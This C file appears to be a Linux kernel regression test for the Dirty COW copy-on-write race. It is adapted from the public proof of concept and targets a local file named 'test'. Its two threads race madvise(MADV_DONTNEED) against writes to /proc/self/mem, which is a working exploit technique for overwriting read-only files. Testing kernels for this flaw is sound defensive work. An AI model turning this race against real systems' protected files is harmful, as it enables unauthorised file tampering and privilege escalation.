1 /*
2 * Copyright (c) 2016 Cyril Hrubis <chrubis@suse.cz>
3 * Based on: https://github.com/dirtycow/dirtycow.github.io
4 *
5 * This program is free software: you can redistribute it and/or modify
6 * it under the terms of the GNU General Public License as published by
7 * the Free Software Foundation, either version 2 of the License, or
8 * (at your option) any later version.
9 *
10 * This program is distributed in the hope that it will be useful,
11 * but WITHOUT ANY WARRANTY; without even the implied warranty of
12 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 * GNU General Public License for more details.
14 *
15 * You should have received a copy of the GNU General Public License
16 * along with this program. If not, see <http://www.gnu.org/licenses/>.
17 */
18
19 #include <sys/mman.h>
20 #include <fcntl.h>
21 #include <pthread.h>
22 #include <unistd.h>
23 #include <sys/stat.h>
24 #include <string.h>
25 #include <stdlib.h>
26 #include <pwd.h>
27
28 #include "tst_safe_pthread.h"
29 #define TST_NO_DEFAULT_MAIN
30 #include "tst_test.h"
31
32 #define FNAME "test"
33 #define STR "this is not a test\n"
34
35 static char *str = "m00000000000000000";
36 static void *map;
37 static int mfd;
38
39 /*
40 * You have to race madvise(MADV_DONTNEED) ::
41 * https://access.redhat.com/security/vulnerabilities/2706661
42 *
43 * This is achieved by racing the madvise(MADV_DONTNEED) system call while
44 * having the page of the executable mmapped in memory.
45 */
madvise_thread(void * arg)46 static void *madvise_thread(void *arg)
47 {
48 int c = 0;
49
50 (void)arg;
51
52 while (1)
53 c += madvise(map, 100, MADV_DONTNEED);
54
55 tst_res(TINFO, "madvise: %i", c);
56
57 return NULL;
58 }
59
60 /*
61 * You have to write to /proc/self/mem ::
62 * https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
63 *
64 * The in the wild exploit we are aware of doesn't work on Red Hat Enterprise
65 * Linux 5 and 6 out of the box because on one side of the race it writes to
66 * /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise
67 * Linux 5 and 6.
68 */
proc_self_mem_thread(void * arg)69 void *proc_self_mem_thread(void *arg)
70 {
71 int c = 0;
72
73 (void)arg;
74
75 while (1) {
76 lseek(mfd, (uintptr_t) map, SEEK_SET);
77 c += write(mfd, str, strlen(str));
78 }
79
80 tst_res(TINFO, "write: %i", c);
81
82 return NULL;
83 }
84
sighandler(int sig)85 void sighandler(int sig)
86 {
87 (void) sig;
88
89 _exit(0);
90 }
91
92 /*
93 * You have to use MAP_PRIVATE for copy-on-write mapping.
94 * Create a private copy-on-write mapping. Updates to the
95 * mapping are not visible to other processes mapping the same
96 * file, and are not carried through to the underlying file. It
97 * is unspecified whether changes made to the file after the
98 * mmap() call are visible in the mapped region.
99 */
main(void)100 int main(void)
101 {
102 pthread_t pth1, pth2;
103 int fd;
104 struct stat st;
105
106 SAFE_SIGNAL(SIGUSR1, sighandler);
107
108 /* Open it read only and map */
109 fd = SAFE_OPEN(FNAME, O_RDONLY);
110 SAFE_FSTAT(fd, &st);
111
112 map = SAFE_MMAP(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
113 mfd = SAFE_OPEN("/proc/self/mem", O_RDWR);
114
115 /* Try to rewrite it */
116 SAFE_PTHREAD_CREATE(&pth1, NULL, madvise_thread, NULL);
117 SAFE_PTHREAD_CREATE(&pth2, NULL, proc_self_mem_thread, NULL);
118
119 pause();
120
121 return 0;
122 }
123